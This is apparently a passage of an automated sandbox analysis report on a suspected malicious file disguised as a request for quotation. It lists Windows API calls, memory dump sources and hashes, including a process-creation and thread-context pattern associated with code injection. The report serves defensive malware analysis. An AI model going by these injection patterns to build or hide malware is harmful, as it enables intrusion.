                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                                                                                                                                                                                                                                • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3033907384-0
                                                                                                                                                                                                                              • Opcode ID: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
                                                                                                                                                                                                                              • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AE5D6D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                                              • Opcode ID: bc29a9486419719ca63077715cc0f48772d0f8b1a36a9c0023732f1521483a65
                                                                                                                                                                                                                              • Instruction ID: 6c5ccc8735a7216ab8ac895f8f0751dafe711991a9eeb3556d3479dff73ca81b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc29a9486419719ca63077715cc0f48772d0f8b1a36a9c0023732f1521483a65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7F08955E04FD0EBDE7FD37BFDCEB712A506F1272DF0C4145A2455A0B286965C16C502
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00C91AD5
                                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C91AF9
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C91B1B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2438371351-0
                                                                                                                                                                                                                              • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                                                                                                                                                              • Instruction ID: 080aedd660e2a43a81e856c411e976d2b8b299b3ea235c04db30c05c1783e298
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C412CD24E24658C6EB24DF64D8547DEB232FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 86197de6b93524e9aea76b601f03e4973b681045060dfe3bf1b6a9407a274384
                                                                                                                                                                                                                              • Instruction ID: ef9c8e57f5c43f6004cebfb2586242c8bee8f2060bd466ac80db703b7598509d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86197de6b93524e9aea76b601f03e4973b681045060dfe3bf1b6a9407a274384
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2171C331C0CBD05EC73A873BA814675BBB06B763ACF4D8A9AD0958B1E3D6718D449392
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
                                                                                                                                                                                                                              • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                                              • Opcode ID: 1c7307e7605e178a4f46017bc53961ffd2370cd713617fee4c5c10c45acb9c04
                                                                                                                                                                                                                              • Instruction ID: 703fb4e51e7414ef2a0eeb7bc43b43b7e3b383bd1c29d48b3ed1298fc8db5a6e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7307e7605e178a4f46017bc53961ffd2370cd713617fee4c5c10c45acb9c04
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD319279A08612AFC714DF19D490A62F7E0FF09310B54C57EE98A9B791D734E841CB8A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e64beda50162301ea35b91e6c0367e5acc081ec0b5a9796b4419f91fb16ebd91
                                                                                                                                                                                                                              • Instruction ID: ba0183b72a38e380850a532ede5ae113a0cd8e0fc52491e9de17607f2509cde7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e64beda50162301ea35b91e6c0367e5acc081ec0b5a9796b4419f91fb16ebd91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A31F071D0C3D18ACB36CB2BC548379BBB06BB27E4F4C8E9AD1858B1E2D6758C049752
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                              • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                                                                                                                                                                                              • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                              • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                                                                              • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                                                                                                                                                              • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                                              • Opcode ID: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                                                                                                                                                                                                                              • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                                                                                                                                                                • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                                                                                                                                                                • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                                                                                                                                                                • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1396898556-0
                                                                                                                                                                                                                              • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                                                                                                                                                              • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                                              • Opcode ID: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                                                                                                                                                                                                                              • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                                                                              • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                                                                                              • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                                              • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                                                                                                                                                                                              • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
